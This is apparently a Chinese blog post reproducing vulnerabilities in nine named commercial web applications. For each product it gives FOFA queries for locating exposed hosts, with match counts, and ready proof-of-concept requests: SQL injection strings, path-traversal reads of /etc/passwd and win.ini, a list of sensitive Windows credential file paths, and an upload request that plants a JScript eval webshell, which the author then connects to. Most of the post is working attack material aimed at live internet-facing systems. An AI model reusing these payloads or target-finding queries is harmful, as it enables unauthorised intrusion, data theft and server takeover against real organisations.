護網漏洞復現(三)

LeouMaster發表於2024-09-04

Mtab書籤導航程式LinkStoregetlcon存在SQL隱碼攻擊漏洞

描述:Mtab書籤導航程式 LinkStore/getIcon 介面存在SQL隱碼攻擊漏洞,未經身份驗證的遠端攻擊者除了可以利用 SQL 注入漏洞獲取資料庫中的資訊(例如,管理員後臺密碼、站點的使用者個人資訊)之外,甚至在高許可權的情況可向伺服器中寫入木馬,進一步獲取伺服器系統許可權

fofa語法:title="Mtab書籤"

POC:

POST /LinkStore/getIcon HTTP/2

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36

Content-Type: application/json

Content-Length: 11

{"url":"*"}

漏洞復現:

fofa中搜尋資產,共有215條資料匹配

螢幕上有字  描述已自動生成

以下是頁面訪問特徵

電腦螢幕畫面  描述已自動生成

訪問http://xxx.xxx.xxx.xxx/LinkStore/getlcon

圖形使用者介面, 應用程式  描述已自動生成

當前頁面抓包,修改GET請求為POST請求

文字  描述已自動生成

將資料包放入到sqlmap中進行測試,漏洞存在

文字  描述已自動生成

用友CRM客戶關係管理help.php存在任意檔案讀取漏洞

描述:用友U8 CRM是一款針對代理銷售服務行業設計的管理軟體,它集客戶關係管理(CRM)、呼叫中心和自動化(OA)核心應用於一體,提供前端營銷、後端業務處理及員工管理的一體化解決方案。該系統的help.php檔案中介面存在任意檔案讀取漏洞,攻擊者在未登入的情況下即可進行漏洞利用。

fofa語法:body="用友 U8CRM"

POC:http://xxx.xxx.xxx.xxx/pub/help.php?key=YTozOntpOjA7czoyNDoiLy4uLy4uLy4uL2FwYWNoZS9waHAuaW5pIjtpOjE7czoxOiIxIjtpOjI7czoxOiIyIjt9

漏洞復現:

fofa中所搜資產,共有1314條資料匹配

圖形使用者介面, 應用程式  描述已自動生成

以下為登入頁面以及頁面特徵

圖形使用者介面, 應用程式, Teams  描述已自動生成

在url後面新增Payload

文字  中度可信度描述已自動生成

在這個也買你查詢error_log可以看到此係統的安裝路徑,如果是C盤,可以檢視更多敏感資訊

圖片包含 背景圖案  描述已自動生成

URL中key的內容是經過base64加密的,原本為以下內容

a:3:{i:0;s:24:"/../../../apache/php.ini";i:1;s:1:"1";i:2;s:1:"2";}

如果直接在URL中拼接以上內容是無法進行檔案讀取的

以下是一些常用的敏感windows檔案路徑

C:\boot.ini //檢視系統版本

C:\Windows\System32\inetsrv\MetaBase.xml //IIS配置檔案

C:\Windows\repair\sam //儲存系統初次安裝的密碼

C:\Program Files\mysql\my.ini //Mysql配置

C:\Program Files\mysql\data\mysql\user.MYD //Mysql root

C:\Windows\php.ini //php配置資訊

C:\Windows\my.ini //Mysql配置資訊

C:\Windows\win.ini //Windows系統的一個基本系統配置檔案

WookTeam輕量級的團隊線上協作系統介面searchinfo存在SQL隱碼攻擊漏洞

描述:WookTeam /api/users/serchinfo介面存在SQL隱碼攻擊漏洞,未經身份驗證的惡意攻擊者可以利用SQL隱碼攻擊漏洞獲取資料庫中的資訊(例如管理員後臺密碼、站點使用者個人資訊)等,攻擊者甚至可以在高許可權下向伺服器寫入命令,進一步獲取伺服器系統許可權

fofa語法:title="Wookteam"

POC:

http://xxx.xxx.xxx.xxx/api/users/searchinfo?where[username]=1') UNION ALL SELECT NULL,CONCAT(0x71627a7a71,0x6a4e626c59524676474f4d446d666c50475265514a7879586f6b4271584365526678617575704f72,0x7162707671),NULL,NULL,NULL#

漏洞復現:

fofa中搜尋資產,共有673條資料匹配

圖形使用者介面  描述已自動生成

以下為登入頁面以及頁面特徵

圖形使用者介面  描述已自動生成

訪問/api/users/searchinfo介面,會顯示當前系統中存在哪些使用者

文字  描述已自動生成

構造Payload,在url後面新增單引號發現報錯了,很明視訊記憶體在SQL隱碼攻擊漏洞

圖形使用者介面, 應用程式, Word  描述已自動生成

將URL放入到sqlmap中進行測試

文字  描述已自動生成

智慧校園(安校易)管理系統存在檔案上傳漏洞

描述:智慧校園(安校易—)管理系統/Tool/ReceiveClassVideo.ashx介面存在任意檔案上傳漏洞,攻擊者可透過該漏洞上傳任意檔案到伺服器上,包括木馬後門檔案,導致伺服器許可權被控制。

fofa語法:title="智慧綜合管理平臺登入"

POC:

POST /Tool/ReceiveClassVideo.ashx?file_tmid=798&orgid=1&classID=1 HTTP/1.1

Host: xxx.xxx.xxx.xxx

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0

Content-Length: 374

Accept: application/json, text/javascript, /; q=0.01

Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,

Connection: close

Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl

X-Requested-With: XMLHttpRequest

Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl

Content-Disposition: form-data; name="File1"; filename="1.aspx"

Content-Type: image/jpeg

<%@ Page Language="Jscript" validateRequest="false" %>

<%

function xxxx(str)

{

​ return eval(str,"unsafe");

}

%>

<%var a = Request.Item["pass"];%>

<%var b = xxxx(a);%>

<%Response.Write(b);%>

------dqdaieopnozbkapjacdbdthlvtlyl--

漏洞復現:

fofa搜尋資產,共有134條資料匹配

圖形使用者介面  描述已自動生成

以下為登陸頁面以及頁面特徵

圖形使用者介面, 網站  描述已自動生成

當前頁面抓包構造資料包

圖形使用者介面, 文字, 應用程式  描述已自動生成

返回內容報錯可以不用管,但是我嘗試了其他的系統只有報“儲存班級影片表失敗”的錯誤才成功

使用蟻劍進行連線

圖形使用者介面, 應用程式  描述已自動生成

連線成功後目標不存在域環境

圖形使用者介面  描述已自動生成

泛微E-office 10 schema_mysql介面敏感資訊洩露漏洞

描述:泛微E-Office 10是一款企業級辦公自動化系統,主要用於最佳化和管理企業的文件、資訊流轉、協作與溝通工作流程。該系統的schema_mysql介面存在敏感資訊洩露漏洞。

fofa語法:body="eoffice_loading_tip" && body="eoffice10"

POC:http://xxx.xxx.xxx.xxx/eoffice10/empty_scene/db/schema_mysql.sql

漏洞復現:

fofa搜尋資產,共有4868條資料匹配

電腦的螢幕截圖  描述已自動生成

以下為登陸頁面以及頁面特徵

建築的擺設佈局  描述已自動生成

當前頁面抓包構造Payload

圖形使用者介面, 文字, 應用程式  描述已自動生成

AVCON-系統管理平臺download.action存在任意檔案讀取漏洞

描述:AVCON-系統管理平臺download.action存在任意檔案讀取漏洞,攻擊者可透過該漏洞讀取配置檔案資訊,造成資訊洩露漏洞。

fofa語法:title="AVCON-系統管理平臺"

POC:http://xxx.xxx.xxx.xxx/download.action?filename=../../../../../../../../etc/passwd

漏洞復現:

fofa搜尋資產,共有50條資產匹配

背景圖案  中度可信度描述已自動生成

以下為登入頁面以及頁面特徵

圖形使用者介面  描述已自動生成

當前頁面抓包構造payload

文字  描述已自動生成

圖形使用者介面, 文字  描述已自動生成

智互聯(深圳)科技有限公司SRM智聯雲採系統download存在任意檔案讀取漏洞

描述:智聯雲採是一款針對企業供應鏈管理難題及智慧化轉型升級需求而設計的解決方案,智聯雲採依託人工智慧、物聯網、大資料、雲等技術,透過軟硬體系統化方案,幫助企業實現供應商關係管理和採購線上化、移動化、智慧化,提升採購和協同效率,進而規避供需風險,強化供應鏈整合能力,構建企業利益共同體。該系統SRM2.0 runtimeLog/download介面存在任意檔案讀取漏洞,未經身份驗證的遠端攻擊者可以透過該漏洞讀取系統重要檔案(如資料庫配置檔案、系統配置檔案)等,導致網站處於極度不安全狀態。

fofa語法:title=="SRM 2.0"

POC:http://xx.xx.xx.xx/adpweb/static/..;/a/sys/runtimeLog/download?path=c:\windows\win.ini

漏洞復現:

fofa搜尋資產,共有744條資料匹配圖形使用者介面, 應用程式  描述已自動生成以下是登陸頁面以及頁面特徵

電腦螢幕畫面  描述已自動生成

當前頁面抓包,構造payload

圖形使用者介面, 文字, 應用程式, 電子郵件  描述已自動生成

科榮AIO管理系統endTime引數存在SQL隱碼攻擊漏洞

描述:科榮AIO endTime介面存在SQL隱碼攻擊漏洞,未經身份驗證的遠端攻擊者除了可以利用SQL隱碼攻擊漏洞獲取資料庫中的資訊(如:管理員後臺密碼、站點使用者個人資訊)之外,甚至在高許可權的情況下可以向伺服器中寫入木馬,進一步獲取伺服器系統許可權。

fofa語法:body="changeAccount('8000')"

POC:http://xx.xx.xx.xx/moffice?op=showWorkPlanList&type=1&beginTime=1&endTime=1*&sid=1

漏洞復現:

fofa搜尋資產,共有1611條資料匹配螢幕上有字  描述已自動生成

以下為登入頁面以及頁面特徵

圖形使用者介面  描述已自動生成

構造payload訪問

img

從返回結果看是存在查詢操作,可能與資料庫有互動

放入到sqlmap中進行測試

文字  描述已自動生成

安美數字酒店寬頻運營系統weather.php任意檔案讀取漏洞

描述:安美數字酒店寬頻運營胸痛weather.php介面存在任意檔案讀取漏洞,未經身份驗證攻擊者可透過該漏洞讀取系統重要檔案,導致網站處於極度不安全狀態。

fofa語法:app="安美數字-酒店寬頻運營系統"

POC:http://xx.xx.xx.xx/user/weather.php?Lang=../../../etc/passwd

漏洞復現:

fofa搜尋資產,共有19條資料匹配

電腦螢幕畫面  描述已自動生成

以下為登入頁面以及頁面特徵

圖形使用者介面, 應用程式  描述已自動生成

構造payload拼接到url後面

img

圖形使用者介面, 文字, 應用程式  描述已自動生成

相關文章